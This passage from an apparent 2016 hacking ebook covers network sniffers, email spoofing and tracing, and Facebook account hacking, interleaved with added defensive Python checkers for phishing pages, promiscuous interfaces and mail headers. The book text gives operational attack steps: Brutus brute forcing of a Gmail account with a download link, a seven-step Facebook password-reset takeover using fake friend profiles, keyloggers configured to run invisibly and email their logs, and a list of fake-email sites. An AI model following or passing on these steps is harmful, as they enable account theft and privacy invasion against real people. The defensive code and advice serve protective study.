Websites And Please Do Not Destroy Any Ones Account This Is Only For
Educational Purpose”
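The advice to watch the link and check the URL before signing in can be automated by a mail filter or proxy. This added example (not from the book) flags a login page whose password form posts somewhere other than the expected domain, which is exactly what the edited action attribute above produces, and flags links whose visible text names a different host than the href. The URLs, sample HTML and function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


def host_in_domain(host, domain):
    """True when host is the domain itself or one of its subdomains."""
    host = (host or "").lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


class PageScan(HTMLParser):
    """Collects password forms and links, resolving relative URLs against the page URL."""

    def __init__(self, page_url=""):
        super().__init__()
        self.page_url = page_url
        self.forms, self.links = [], []
        self._form = self._link = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": urljoin(self.page_url, a.get("action") or ""),
                          "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form and (a.get("type") or "").lower() == "password":
            self._form["password"] = True
        elif tag == "a" and a.get("href"):
            self._link = [urljoin(self.page_url, a["href"]), ""]

    def handle_data(self, data):
        if self._link:
            self._link[1] += data

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "a" and self._link:
            self.links.append((self._link[0], self._link[1].strip()))
            self._link = None


def audit_login_page(page_url, html_text, expected_domain):
    """Findings for a page that claims to be expected_domain's login page."""
    scan = PageScan(page_url)
    scan.feed(html_text)
    findings = []
    page_host = urlparse(page_url).hostname
    if not host_in_domain(page_host, expected_domain):
        findings.append(("page-host", page_host))
    for form in scan.forms:
        if not form["password"]:
            continue
        target = urlparse(form["action"])
        if target.scheme != "https":
            findings.append(("form-not-https", form["action"]))
        if not host_in_domain(target.hostname, expected_domain):
            findings.append(("form-posts-elsewhere", form["action"]))
    return findings


def mismatched_links(html_text):
    """Links whose visible text looks like a host or URL that the href does not lead to."""
    scan = PageScan()
    scan.feed(html_text)
    bad = []
    for href, text in scan.links:
        if not text or " " in text or "." not in text:
            continue  # visible text is ordinary words, nothing to compare
        named = urlparse(text if "://" in text else "//" + text).hostname
        if named and not host_in_domain(urlparse(href).hostname, named):
            bad.append((text, href))
    return bad


# Constructed samples: a cloned page as described above, the genuine form, a lure e-mail.
CLONE_URL = "http://login-example.test/index.htm"
CLONE_HTML = ('<form action="post.php" method="post"><input type="text" name="email">'
              '<input type="password" name="pass"></form>')
GENUINE_URL = "https://www.facebook.com/login.php"
GENUINE_HTML = ('<form action="https://www.facebook.com/login.php?login_attempt=1" '
                'method="post"><input type="password" name="pass"></form>')
MAIL_HTML = ('<p>Your account is locked. '
             '<a href="http://login-example.test/index.htm">https://www.facebook.com/login</a></p>')

if __name__ == "__main__":
    print(audit_login_page(CLONE_URL, CLONE_HTML, "facebook.com"))
    print(audit_login_page(GENUINE_URL, GENUINE_HTML, "facebook.com"))
    print(mismatched_links(MAIL_HTML))
```

The domain comparison is a plain suffix match; a production filter would also normalise internationalised names and use a public-suffix list.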
15. Sniffers
Sniffers are almost as old as the Internet itself. They are one of the first tools that
allowed system administrators to analyze their network and pinpoint where a problem
is occurring. Unfortunately, crackers also run sniffers to spy on your network and steal
various kinds of data. This paper discusses what a sniffer is, some of the more popular
sniffers, and ways to protect your network against them. It also talks about a popular
tool called Antisniff, which allows you to automatically detect sniffers running on your
network.
What Are Sniffers ?
In a non-switched network, Ethernet frames broadcast to all machines on the network,
but only the computer that the packets are destined for will respond. All of the other
machines on that network still see the packet, but if they are not the intended receiver,
they will disregard it. When a computer is running sniffer software and its network
interface is in promiscuous mode (where it listens for ALL traffic), then the computer
has the ability to view all of the packets crossing the network.
If you are an Internet history buff and have been wondering where the term sniffer
came from, Sniffer was a product that was originally sold by Network General. It
became the market leader and people started referring to all network analyzers as
“sniffers.” I guess these are the same people who gave the name Q-Tip to cotton swabs.
Who Uses Sniffers ?
LAN/WAN administrators use sniffers to analyze network traffic and help determine
where a problem is on the network. A security administrator could use multiple sniffers,
strategically placed throughout their network, as an intrusion detection system. Sniffers
are great for system administrators, but they are also one of the most common tools a
hacker uses.
Crackers install sniffers to obtain usernames, passwords, credit card numbers, personal
information, and other information that could be damaging to you and your company if
it turned up in the wrong hands. When they obtain this information, crackers will use
the passwords to attack other Internet sites and they can even turn a profit from selling
credit card numbers.
Defeating Sniffers
One of the most obvious ways of protecting your network against sniffers is not to let
your systems get broken into in the first place. If a cracker cannot gain access to your system,
then there is no way for them to install a sniffer onto it. In a perfect world, we would be
able to stop here. But since there are an unprecedented number of security holes found
each month and most companies don’t have enough staff to fix these holes, then crackers
are going to exploit vulnerabilities and install sniffers. Since crackers favor a central
location where the majority of network traffic passes (i.e. Firewalls, proxies), then these
are going to be their prime targets and should be watched closely. Some other possible
“victims” where crackers like to install sniffers are next to servers where personal
information can be seen (i.e. Webservers, SMTP servers).
A good way to protect your network against sniffers is to segment it as much as possible
using Ethernet switches instead of regular hubs. Switches have the ability to segment
your network traffic and prevent every system on the network from being able to “see”
all packets. The drawback to this solution is cost. Switches are two to three times more
expensive than hubs, but the trade-off is definitely worth it. Another option, which you
can combine with a switched environment, is to use encryption. The sniffer still sees the
traffic, but it is displayed as garbled data. Some drawbacks of using encryption are the
speed and the chance of you using a weak encryption standard that can be easily
broken. Almost all encryption will introduce delay into your network. Typically, the
stronger the encryption, the slower the machines using it will communicate. System
administrators and users have to compromise somewhere in the middle. Even though
most system administrators would like to use the best encryption on the market, it is
just not practical in a world where security is seen as a profit taker, not a profit maker.
Hopefully the new encryption standard that should be out shortly, AES (Advanced
Encryption Standard), will provide strong enough encryption and transparency to the
user to make everybody happy.
Some form of encryption is better than no encryption at all. If a cracker is running a
sniffer on your network and notices that all of the data that he (or she) is collecting is
garbled, then most likely they will move on to another site that does not use encryption.
But a paid or determined hacker is going to be able to break a weak encryption
standard, so it is better to play it smart and provide the strongest encryption as long as
it will not have everybody giving you dirty looks when you walk down the halls at work.
AntiSniff
In 1999, our buddies at L0pht Heavy Industries released a product called Antisniff. This
product attempts to scan your network and determine if a computer is running in
promiscuous mode. This is a helpful tool because if a sniffer is detected on your network,
then 9 times out of 10, the system has been compromised. This happened to the
Computer Science Department at California State University Stanislaus. Here is what
they posted on their local website: “A sniffer program has been found running on the
Computer Science network. Sniffer programs are used to capture passwords. In order to
protect yourself please change your password. Do not use a word out of a dictionary, put
a number on the end of a word or use proper names. Be inventive, use special characters
and have 8 characters in your password.” I am sure there are hundreds of similar
postings on internal websites throughout the world that don’t make it public as they
have.
Antisniff also helps you find those system administrators who run a sniffer to find out
what is wrong with their local network, but forget to ask for authorization beforehand. If
you need to run a sniffer, then you should get permission in writing. If your Security
Administrator is running Antisniff, then there is a good chance they will find it and you
will have to explain why you are running a sniffer without authorization. Hopefully your
security policy has a section on sniffers and will provide some guidance if you need to
run a sniffer. At the time of this writing, Antisniff version 1.021 is the current release.
There is a nice GUI available for Windows 95/98/and NT machines. A command line
version is also available for Solaris, OpenBSD, and Linux. This version of Antisniff only
works in a “flat non-switched” environment. If your network is designed with routers
and switches, then Antisniff does not have the same functionality as in a non-switched
environment. You can only use it on local networks that do not cross a router or switch.
According to L0pht’s website, the next major release of Antisniff will have the ability to
figure out if a computer is running in promiscuous mode over routers and switches. The
next release of Antisniff should definitely be more beneficial to system administrators
because the price of switches is coming down and most companies are upgrading to
switches to obtain 100/Full Mbps speeds. Even though you have a totally switched
environment, you are still not out of the water. There are still firewalls, proxies,
webservers, ftp servers, etc. where crackers still have the ability to install a sniffer and
capture data locally. The only difference is, you have taken away their ability to capture
data over the network.
Antisniff can also be used by blackhats to find intrusion detection systems. If they know
where your intrusion detection systems are, then they can become stealth attackers,
causing you much pain because you just spent $150,000 on a new intrusion detection
system and they found a way to bypass it.
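Antisniff probes other machines over the network. A complementary check that works regardless of switches is to ask each host you administer whether one of its own interfaces is in promiscuous mode. This added example (not from the original paper and not Antisniff's method) reads the flags word Linux exposes under /sys/class/net/<iface>/flags and tests the IFF_PROMISC bit; the authorized list and the sample tree are assumptions constructed for illustration.

```python
import os
import tempfile

IFF_PROMISC = 0x100  # promiscuous-mode bit, as defined in <linux/if.h>


def read_flags(sysfs_root="/sys/class/net"):
    """Map interface name -> flags word read from <root>/<iface>/flags (hex text)."""
    flags = {}
    for name in sorted(os.listdir(sysfs_root)):
        try:
            with open(os.path.join(sysfs_root, name, "flags")) as fh:
                flags[name] = int(fh.read().strip(), 16)
        except (OSError, ValueError):
            continue  # not an interface directory, or unreadable
    return flags


def promiscuous_interfaces(sysfs_root="/sys/class/net"):
    """Interfaces whose flags word has IFF_PROMISC set."""
    return [n for n, f in read_flags(sysfs_root).items() if f & IFF_PROMISC]


def unexpected_promiscuous(sysfs_root="/sys/class/net", authorized=()):
    """Promiscuous interfaces that are not on the written-authorization list
    (for example a monitoring port that an IDS sensor is meant to listen on)."""
    allowed = set(authorized)
    return [n for n in promiscuous_interfaces(sysfs_root) if n not in allowed]


def build_sample_tree():
    """Constructed stand-in for /sys/class/net so the check runs on any OS."""
    root = tempfile.mkdtemp(prefix="sysnet-")
    sample = {"lo": "0x9", "eth0": "0x1003", "eth1": "0x1103", "span0": "0x1103"}
    for name, value in sample.items():
        os.mkdir(os.path.join(root, name))
        with open(os.path.join(root, name, "flags"), "w") as fh:
            fh.write(value + "\n")
    # /sys/class/net can also hold plain files; they must be skipped, not crash.
    with open(os.path.join(root, "bonding_masters"), "w") as fh:
        fh.write("\n")
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    print("promiscuous:", promiscuous_interfaces(root))
    print("unauthorized:", unexpected_promiscuous(root, authorized={"span0"}))
```

On a real Linux host, call unexpected_promiscuous() with the default path and the list of interfaces that have written approval to capture traffic.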
16. Email Hacking
How Email Works?
Email sending and receiving is controlled by the Email servers. All Email service
providers configure Email Server before anyone can Sign into his or her account
and start communicating digitally.
Once the servers are ready to go, users from across the world register in to these
Email servers and setup an Email account. When they have a fully working
Email account, they sign into their accounts and start connecting to other users
using the Email services.
Email Travelling Path
Let’s say we have two Email providers, one is Server1.com and other is
Server2.in, ABC is a registered user in Server1.com and XYZ is a registered user
in Server2.in.
ABC signs in to his Email account in Server1.com, he then writes a mail to
xyz@server2.in, clicks on Send and gets the message that the Email is sent
successfully.
But what happens behind the curtains? The Email from the computer of
abc@server1.com is forwarded to the Email server of Server1.com. Server1 then
looks for server2.in on the internet and forwards the Email to server2.in for
the account of XYZ. Server2.in receives the Email from server1.com and puts it in
the account of XYZ.
XYZ then sits on computer and signs in to her Email account. Now she has the
message in her Email inbox.
Email Service Protocols
SMTP : SMTP stands for Simple Mail Transfer Protocol. SMTP is used when Email is
delivered from an Email client, such as Outlook Express, to an Email server or when
Email is delivered from one Email server to another. SMTP uses port 25.
POP3 : POP3 stands for Post Office Protocol. POP3 allows an Email client to download
an Email from an Email server. The POP3 protocol is simple and does not offer many
features except for download. Its design assumes that the Email client downloads all
available Email from the server, deletes them from the server and then disconnects.
POP3 normally uses port 110.
IMAP : IMAP stands for Internet Message Access Protocol. IMAP shares many similar
features with POP3. It, too, is a protocol that an Email client can use to download Email
from an Email server. However, IMAP includes many more features than POP3. The
IMAP protocol is designed to let users keep their Email on the server. IMAP requires
more disk space on the server and more CPU resources than POP3, as all Emails are
stored on the server. IMAP normally uses port 143.
Configuring an Email Server
Email server software like Post cast Server, Hmailserver, Surge mail, etc. can be
used to convert your Desktop PC into an Email sending server.
HMailServer is an Email server for Microsoft Windows. It allows you to handle
all your Email yourself without having to rely on an Internet service provider
(ISP) to manage it. Compared to letting your ISP host your Email, HMailServer
adds flexibility and security and gives you the full control over spam protection.
Email Security
Now let’s check how secure this fast means of communication is. There are so
many attacks which are applied on Emails. There are people who are the masters
of these Email attacks and they always look for the innocent people who are not
aware of these Email tricks and are ready to get caught in their trap.
You have to make sure that you are not an easy target for those people. You have
to secure your Email identity and profile, make yourself a tough target.
If you have an Email ID, do not feel that it does not matter if it is hacked because
there is no important information in that Email account. You do not know what
happens if someone gets your Email ID password and uses your Email to send a
threatening Email to the Ministry or to the News Channels.
The attacker is not bothered about your data in the Email. He just wants a victim
Email ID which will be used in the attack. There are a lot of ways in which one
can misuse your Email. I am sure that you have come across some of the cases
where a student gets an Email from his friends abusing him, or cases of Porn
Emails where the owner of the Email ID does not know anything about the
sent Email.
Email Spoofing
Email spoofing is the forgery of an Email header so that the message appears to
have originated from someone or somewhere other than the actual source.
Distributors of spam often use spoofing in an attempt to get recipients to open,
and possibly even respond to, their solicitations. Spoofing can be used
legitimately.
There are so many ways to send the Fake Emails even without knowing the
password of the Email ID. The Internet is so vulnerable that you can use
anybody's Email ID to send a threatening Email to any official personnel.
Methods To Send Fake Emails
1. Open Relay Server
2. Web Scripts
Fake Emails : Open Relay Server
An Open Mail Relay is an SMTP (Simple Mail Transfer Protocol) server
configured in such a way that it allows anyone on the Internet to send Email
through it, not just mail destined ‘To’ or ‘Originating’ from known users.
An Attacker can connect to the Open Relay Server via Telnet and instruct the
server to send the Email.
Open Relay Email Server requires no password to send the Email.
Fake Emails : Via Web Script
Web Programming languages such as PHP and ASP contain mail sending
functions which can be used to send Emails by programming Fake headers, i.e.
“From:”, “To:”, “Subject:”.
There are so many websites available on the Internet which already contain
these mail sending scripts. Most of them provide the free service.
Some of Free Anonymous Email Websites are :
Mail.Anonymizer.name (Send attachments as well)
FakEmailer.net
FakEmailer.info
Deadfake.com
PHP Mail Sending Script
<?php
// the message
$msg = "First line of text\nSecond line of text";
// use wordwrap() if lines are longer than 70 characters
$msg = wordwrap($msg,70);
// send email
mail("someone@example.com","My subject",$msg);
?>
Consequences Of Fake Emails
Email from your Email ID to any Security Agency declaring a Bomb Blast can
make you spend rest of your life behind the iron bars.
Email from you to your Girl friend or Boy friend can cause Break-Up and set
your friend’s to be in relationship.
Email from your Email ID to your Boss carrying your Resignation Letter or
anything else which you can think of.
There can be so many cases drafted on Fake Emails.
Proving A Fake Email
Every Email carries a Header which has information about the Travelling Path of
the Email.
Check the Header and get the location from which the Email was sent.
Check if the Email was sent from any other Email Server or Website.
Headers carry the name of the Website on which the mail sending script was
used.
Email Bombing
Email Bombing is sending an Email message to a particular address at a specific
victim site. In many instances, the messages will be large and constructed from
meaningless data in an effort to consume additional system and network
resources. Multiple accounts at the target site may be abused, increasing the
denial of service impact.
Email Spamming
Email Spamming is a variant of Bombing; it refers to sending Email to hundreds
or thousands of users (or to lists that expand to that many users). Email
spamming can be made worse if recipients reply to the Email, causing all the
original addressees to receive the reply. It may also occur innocently, as a result
of sending a message to mailing lists and not realizing that the list explodes to
thousands of users, or as a result of a responder message (such as vacation(1))
that is set up incorrectly.
Email Password Hacking
There is no specified attack available just to hack the password of Email
accounts. Also, it is not so easy to compromise the Email server like Yahoo,
Gmail, etc.
Email Password Hacking can be accomplished via some of the Client Side
Attacks. We try to compromise the user and get the password of the Email
account before it reaches the desired Email server.
We will cover many attacks by the workshop flows, but at this time we will talk
about the very famous 'Phishing attack'.
Phishing
The act of sending an Email to a user falsely claiming to be an established
legitimate enterprise in an attempt to scam the user into surrendering private
information that will be used for identity theft.
The Email directs the user to visit a Web site where they are asked to update
personal information, such as passwords and credit card, social security, and
bank account numbers, that the legitimate organization already has. The Web
site, however, is Bogus and set up only to steal the User’s information.
Phishing Scams Could Be
Emails inviting you to join a Social Group, asking you to Login using your
Username and Password.
Email saying that Your Bank Account is locked and Sign in to Your Account to
Unlock IT.
Emails containing some Information of your Interest and asking you to Login to
Your Account.
Any Email carrying a Link to Click and asking you to Login.
Prevention Against Phishing
Read all the Email Carefully and Check if the Sender is Original
Watch the Link Carefully before Clicking
Always check the URL in the Browser before Signing IN to your Account
Always Login to Your Accounts after opening the Trusted Websites, not by
Clicking in any other Website or Email.
Email Tracing
Tracing an Email means locating the Original Sender and Getting to know the IP
address of the network from which the Email was actually generated.
To get the information about the sender of the Email we first must know the
structure of the Email.
As we all know the travelling of the Email. Each message has exactly one header,
which is structured into fields. Each field has a name and a value. Header of the
Email contains all the valuable information about the path and the original
sender of the Email.
To trace an Email, log in to your Email account, open the Email which you want
to trace, and then find the header of that received Email.
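The header checks described under Proving A Fake Email and Email Tracing can be scripted. This added example (not from the book) walks the Received lines from the newest hop down, stops at the first hop that was not written by a server the recipient controls, and reports the host and IP that handed the message in, together with the SPF verdict and any script-identifying header. The message, host names and the trusted-host set are constructed for illustration.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample message using documentation addresses, not a real capture.
# Headers are newest hop first. The lowest Received line was supplied by the
# sender: no server the recipient controls vouches for it.
RAW = """\
Received: from mx.server2.example (mx.server2.example [203.0.113.20])
    by mail.server2.example with ESMTP id A1; Mon, 4 Jan 2016 10:00:05 +0000
Received: from webhost.example (webhost.example [198.51.100.7])
    by mx.server2.example with ESMTP id B2; Mon, 4 Jan 2016 10:00:03 +0000
Authentication-Results: mx.server2.example; spf=fail smtp.mailfrom=abc@server1.example
Received: from mail.server1.example (mail.server1.example [192.0.2.1])
    by relay.invalid with SMTP id C3; Mon, 4 Jan 2016 09:59:00 +0000
X-PHP-Originating-Script: 1001:send.php
From: ABC <abc@server1.example>
To: xyz@server2.example
Subject: Resignation

Please accept my resignation.
"""

IP_RE = re.compile(r"\[(?:IPv6:)?([0-9A-Fa-f:.]+)\]")


def parse_hops(msg):
    """Received headers in header order (newest first) as from/ip/by dicts."""
    hops = []
    for value in msg.get_all("Received", []):
        frm = re.search(r"^\s*from\s+(\S+)", value)
        by = re.search(r"\bby\s+(\S+)", value)
        ip = IP_RE.search(value)
        hops.append({
            "from": frm.group(1).lower() if frm else None,
            "ip": ip.group(1) if ip else None,
            "by": by.group(1).lower() if by else None,
        })
    return hops


def trace(raw, trusted_hosts):
    """Find the last verifiable handoff into the recipient's own mail servers."""
    msg = message_from_string(raw)
    hops = parse_hops(msg)
    handoff, verified = None, 0
    for hop in hops:
        if hop["by"] not in trusted_hosts:
            break  # everything from here down could have been typed by the sender
        handoff, verified = hop, verified + 1

    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()

    # Only believe an Authentication-Results header stamped by our own server.
    spf = None
    for value in msg.get_all("Authentication-Results", []):
        authserv, _, results = value.partition(";")
        found = re.search(r"\bspf=(\w+)", results)
        if authserv.strip().lower() in trusted_hosts and found:
            spf = found.group(1).lower()
            break

    host = handoff["from"] if handoff else None
    matches = bool(host and from_domain and
                   (host == from_domain or host.endswith("." + from_domain)))
    return {
        "external_host": host,
        "external_ip": handoff["ip"] if handoff else None,
        "from_domain": from_domain,
        "host_matches_from": matches,
        "spf": spf,
        "script": msg.get("X-PHP-Originating-Script"),
        "unverified_hops": len(hops) - verified,
    }


if __name__ == "__main__":
    ours = {"mail.server2.example", "mx.server2.example"}
    for key, value in trace(RAW, ours).items():
        print(f"{key}: {value}")
```

Here the message claims to come from server1.example, but the verifiable handoff came from a web host, SPF failed, and the script header names the page that sent it.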
Email Hacking Using Keyloggers
Keystroke Loggers (or Key loggers) intercept the Target’s keystrokes and either
save them in a file to be read later, or transmit them to a predetermined
destination accessible to the Hacker.
Since Keystroke logging programs record every keystroke typed in via the
keyboard, they can capture a wide variety of confidential information, including
passwords, credit card numbers, and private Email correspondence, names,
addresses, and phone numbers.
Types Of Keyloggers
Hardware keylogger
Software keylogger
(For More Information About Keylogger Read Article 11. Keylogger)
Email Hacking Using Brutus AET2
As We Know That We Have Some Passwords For Our Email Ids And We Need These
Passwords To Open Email Ids, We Can't Access Any Email Id Without Password, But
Hackers Can Hack The Password Of Email Ids.. BRUTUS Is Software That Is Used To
Trace The Password Of Any Email Id. This Software Works On The Concept Of Brute
Force Attack. The Speed Of Working Of This Software Completely Depends On The
Speed Of Internet..
How To Use ? (This Example Is For Gmail)
1. Open Brutus
2. Select pop3 in type option
3. Write pop address of target email server in target option (ex. : pop.gmail.com)
4. Select Brute Force option in pass mode
5. Enter Email ID in user file option (ex : example@gmail.com)
6. Click On Start
After Some Time, It Will Show The Password Of Email Id. It May Take An Hour To
Trace That..
Download Brutus AET2 : http://www107.zippyshare.com/v/rS7YQw9g/file.html
YouTube Tutorial : https://www.youtube.com/watch?v=TQvRT-feHjU
Securing Your Email Account
Always configure a Secondary Email Address for the recovery purpose.
Properly configure the Security Question and Answer in the Email Account.
Do Not Open Emails from strangers.
Do Not Use any other’s computer to check your Email.
Take Care of the Phishing Links.
Do not reveal your Passwords to your Friends or Mates..
17. Hack Facebook Accounts and Passwords
Facebook is easily the most popular social networking site in the entire world. Each day,
millions and millions of users log in to check their news feeds, connect with friends and
family, and even make calls. There’s just one problem. People, even those who aren’t
adept at hacking, can compromise others’ accounts by stealing their passwords. It may
sound like something out of an action film, but the honest truth is that there are
unbelievably simple methods that most people can use to gain access to someone else’s
Facebook account.
If you want to become a competent hacker, knowing methods for hacking Facebook
passwords is paramount to your learning. Now, I certainly don’t advocate using these
methods to break into other people’s personal accounts and compromise their privacy.
Not only is that illegal, it is morally wrong. If you’re reading this because you want to
get back at an ex or cause disruption, then you probably shouldn’t be reading this guide.
On a more practical note, knowing how people hack into Facebook accounts is critical if
you want to avoid being hacked. There are several things users can do to protect
themselves from the most common Facebook attacks, as we’ll discuss later.
The Password Reset
This type of attack lacks the razzle-dazzle of the more complex types of attacks, but the
fact remains that it is a simple yet effective way to commandeer another user’s Facebook
profile. In fact, this method is commonly used to hijack all sorts of different online
accounts. By changing the password, the attacker not only gains access to the profile,
but they simultaneously bar the owner of the account from accessing their profile. More
often than not, this attack is performed by a friend or acquaintance that has access to
the target’s personal computer or mobile device. You’d be surprised how many people
don’t even log out of Facebook or cache their username and password in their browser
because they are lazy. The steps are as follows :
Step 1 : The first step in this attack is to determine the email address used to login to a
user’s profile. If an attacker doesn’t already know the target’s email addresses, guess
what? Most people list this information in the contact section of their Facebook profile.
Step 2 : Now all an attacker needs to do is click on the Forgotten your
password? button and enter in the assumed email address of the target. Next, an
attacker would click on the This is my account
Step 3 : Next, the password reset procedure will ask if the user wants to reset their
password via email. However, many times people will delete old email accounts and use
new ones. That’s why there’s a link that says No longer have access to these? Click
the link to continue.
Step 4 : The next step in the process is to update the email address linked to the
account. The prompt will ask for new contact information via the How can we reach
you? Make sure the email address you enter isn’t linked to another Facebook profile.
Step 5 : This step is a little more challenging, because it will ask a security question. If
the attacker knows the target personally, this is going to be extremely easy. However, if
the attacker doesn’t know the target very well, they can make an educated guess.
Sometimes they even dig through the victim’s Facebook profile to glean information
about possible correct answers to the security question. Once the correct answer has
been discovered, the attacker needs to wait 24 hours before they can login.
Step 6 : In the event that the attacker couldn’t guess the right answer to the security
question, there is an option to Recover your account with help from friends. The
only problem is that a lot of people ‘friend’ people on Facebook that they don’t know too
well. Select between 3 and 5 friends that will be candidates for the rest of the attack
process.
Step 7 : This part of the password reset process sends passwords to the friends. There
are two methods to this part of the process. Firstly, an attacker can contact these
individuals from the fake email address to request the new password, and bonus points
if the email address looks like the actual victim.
In addition, the attacker can create 3 to 5 fake Facebook profiles and try to ‘friend’ the
target on Facebook ahead of time. Then, all the attacker would need to do is select 3 to 5
of the bogus profiles during the procedure.
How to Prevent This Attack?
It’s frightening how easy this attack is to carry out. The good news is that there are
several things users can do to protect themselves from becoming the next victim of an
attack as follows :
Use an email address that is only dedicated to Facebook use.
Don’t list your email address on your Facebook profile.
Make your security question as complex and difficult to guess as possible. If you
really want to get tricky, you could enter a bogus answer that is unrelated to the
question (as long as you can remember it!). For example, if the security question
asks for your mother’s maiden name, you could enter
“JohnjacobjingleheimershmidtLarsson” (though there is character limit) or some
other variant that is nearly impossible to guess. Omit personal information that
is easy to guess such as pet names, birthdates, anniversaries, etc.
Using the Infamous Keylogger Method
A keylogger is a nasty piece of software because it records every single keystroke a user
types and records that information invisibly. Usernames, passwords, and payment card
data are all up for grabs if a hacker successfully installs a keylogger on a target’s
computer. The first type we’ll look at for hacking Facebook is a software keylogger.
The problem with software keyloggers is getting them installed on the target computing
device. This can be extremely complex if a hacker wants to do it remotely, but if an
attacker is a friend or personal acquaintance of the target, then this step becomes much
easier. There are plenty of different keyloggers out there, but you can find many of them
absolutely free of charge. After the software has been installed on the target computer,
make sure you configure the settings to make it invisible and to set an email that the
software will send the reports to.
Hardware Keyloggers
There are also hardware keyloggers in existence that look like a flash drive or wireless
USB stick. These really work best on desktop computers because they can be inserted
into the back of the computer and as they say, outta sight, outta mind. The code on the
USB stick will effectively log keystrokes, though it isn’t effective for laptops. Some of
them even look like old PS2 keyboard and mouse jacks. You can easily find one online.
How to Prevent This Attack?
Keyloggers are nasty business, but there are several things users can do to protect
themselves online as follows :
Use firewalls. Keyloggers have to send their report of logged keystrokes to
another location, and some of the more advanced software firewalls will be able
to detect suspicious activity.
Also, users should use a password database. These handy password vaults
usually have tools that automatically generate random, secure passwords. You
see, the keylogger won’t be able to see these passwords since you didn’t
technically type them. Just make sure you always copy/paste the passwords
when you log into an account.
Stay on top of software updates. Once an exploit has been found in an operating
system, the OS manufacturer will typically include patches and bug fixes in
following updates to ensure that the attack can’t be performed again.
Change passwords on a regular basis. Some users who are extremely security
conscious will change their passwords every two weeks or so. If this sounds too
tedious, you could even do it every month or every three months. It may seem
unreasonably zealous, but it will render stolen passwords useless.
Phishing
You’d be surprised how gullible the average Internet user is these days. Most people
don’t even check the URL of the site they are visiting as long as the web page looks as
they expected it to look. A lot of people have created links to bogus URLs that look and
behave exactly like the Facebook login page. Oftentimes these fake links are embedded
into social media buttons on a website.
For example, there might be a “Share on Facebook” link, but in order to share the
content the user first needs to log in to their account. The phishing attempt simply
stores the user’s credentials instead of sending them to their Facebook account. Some of
the more advanced ones store a copy of the user’s input, and then supply that
information to the actual Facebook login page. To the user, it looks as though they have
genuinely logged into Facebook, when in fact, they first visited a phishing site.
Believe it or not, it isn’t that difficult to clone a website. All an attacker needs is a fake
page and a passable URL that is extremely close to the real URL. Furthermore,
attackers can mass email these links to email lists that are purchased online and
they’re dirt cheap, too. Though it is 2016 and phishing filters are becoming increasingly
sophisticated, they’re not perfect.
How to Prevent This Attack?
There are a few simple and basic things users can do to prevent becoming the next
victim of a phishing attack as follows :
Never follow links from emails, especially those that come from sources you don’t
already know. If you think you can trust the sender, always check the URL of the
link before visiting the page. However, it’s better to visit the website directly.
Always check links on forums, websites, chatrooms, etc. Believe it or not, even
popup ads can contain bogus links to phishing sites. If it doesn’t look legit, don’t
click on it!
Always use anti-virus and security software. Many of them include phishing
filters that will stop users from visiting phishing sites.
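The URL check recommended in the list above can be made mechanical. The following is an added Python example, not code from the book: `check_link`, `edit_distance` and `triage` are hypothetical names, the trusted domain is taken from the text, and the sample links are constructed.

```python
from urllib.parse import urlsplit

TRUSTED = "facebook.com"  # the site the user actually intends to log in to

# Constructed sample links (reserved example domains), not real sites.
SAMPLE_LINKS = [
    "https://www.facebook.com/login.php",
    "http://www.facebook.com/login.php",
    "https://facebook.com.account-verify.example/login",
    "https://faceb00k.example/login",
    "https://facebook.com@login.example/",
    "https://news.example.org/story",
]


def edit_distance(a, b):
    """Levenshtein distance between two short strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_link(url, trusted=TRUSTED):
    """Return (verdict, reason) for a link that claims to lead to `trusted`."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower().rstrip(".")
        userinfo = parts.username
    except ValueError:
        return "reject", "URL does not parse"
    if parts.scheme != "https":
        return "reject", "not HTTPS"
    # Only the exact domain or a true subdomain counts as the real site.
    if host == trusted or host.endswith("." + trusted):
        return "ok", "host is %s or a subdomain of it" % trusted
    if userinfo is not None:
        return "reject", "text before '@' is not the host; real host is " + host
    brand = trusted.split(".")[0]
    labels = host.split(".")
    if any(label.startswith("xn--") for label in labels):
        return "reject", "punycode label may render like another name"
    if any(brand in label for label in labels):
        return "reject", "brand name used inside a different domain"
    if min(edit_distance(label, brand) for label in labels) <= 2:
        return "reject", "host label is within 2 edits of the brand name"
    return "unknown", "host is unrelated to " + trusted


def triage(links):
    """Map each link to its verdict."""
    return {link: check_link(link)[0] for link in links}


if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print(link, "->", *check_link(link))
```

The decision is made on the parsed hostname only, never on how the link text or the page looks, which is the point of the advice above.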
Stealing Cookies
Cookies are a necessary evil for some sites, but too often users lazily store their login
credentials in browser cookies without knowing any better. But an attacker doesn’t
always need access to a target’s computer to steal a cookie. There are many sniffing
techniques that can be performed across a LAN, such as the wireless network in a coffee
shop. Once the cookie has been stolen, the hacker can then load the cookie into their
browser, fooling Facebook into believing that the victim has already logged into their
account.
For example, an attacker could utilize Firesheep, which is an add-on for Firefox that
sniffs traffic on Wi-Fi networks to steal cookies and store them within the attacker’s web
browser. Once the attacker has stolen the cookie, they can log in to the target’s Facebook
account, provided that the target is still logged in. Then, the attacker can change the
password of the profile. However, if the victim logs out of Facebook, the cookie will be
worthless.
Facebook Security and Attack Prevention
There are also some general techniques and best practices to avoid becoming the next
victim of a Facebook attack. Some of them should be common sense, but too many users
fail to give security a second thought.
Only use trusted wireless networks. If you need an Internet connection and
happen to spot an unknown SSID, it’s in your best interest to leave it alone.
Within your Facebook profile, click on Account Settings and look in the
Security section. Enable Secure Browsing, and make sure you always use HTTPS to
prevent cookie theft.
Always log out after you are finished browsing Facebook to prevent a cookie
attack. Too many users simply click the “X” in their tab or browser, which doesn’t
log you out.
Connect using a VPN connection. This will encrypt all of your data before
sending it to the VPN server, so local network attackers won’t be able to see what
data you’re transmitting.
Less is more. Though users are frequently tempted to share their personal
information with the world, you would do well to limit how much information you
post online. Make sure private information such as email addresses, current
location, and other similar information isn’t shared on Facebook.
